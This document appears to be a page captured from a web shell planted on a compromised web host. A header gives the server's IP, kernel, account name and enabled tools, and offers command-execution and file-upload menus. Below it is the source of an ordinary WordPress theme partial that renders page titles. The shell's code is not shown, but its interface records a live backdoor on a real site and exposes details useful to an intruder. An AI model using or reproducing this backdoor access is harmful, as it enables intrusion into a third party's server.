Server IP : 89.26.249.46  /  Your IP : 216.73.216.42
Web Server : Apache
System : Linux a.cp.cloudlink.pt 4.18.0-553.121.1.lve.el8.x86_64 #1 SMP Thu Apr 30 16:40:41 UTC 2026 x86_64
User : eticalga ( 1129)
PHP Version : 8.3.31
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0755) :  /home/eticalga/www/files/themes/kobuxeticalgarve/partials/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home/eticalga/www/files/themes/kobuxeticalgarve/partials/page-top.php
<?php

/**
 * Partial: Page top
 *
 * @package kobuxeticalgarve
 */

if (is_home()) {
    $page_id = get_option('page_for_posts', true);
} else {
    $page_id = get_the_ID();
}

?>

<div class="page-title-wrapper container-wrapper">
    <div class="container large">
        <h1 class="page-title <?php if (has_excerpt()) { echo 'page-title-with-excerpt'; } ?>"><?php echo get_the_title($page_id); ?></h1>
        <?php if (has_excerpt()) { echo '<p class="excerpt">' . get_the_excerpt() . '</p>'; } ?>
    </div>
    <?php
    switch ($page_id) {
        case 11:
            ?>
            <div class="svg-animate triangles" data-shape="shape-03" data-morph="amount"></div>
            <?php
            break;       
        case 40:
            ?>
            <div class="svg-animate blast-2" data-shape="shape-04" data-morph="amount"></div>
            <?php
            break;
    }
    ?>
</div>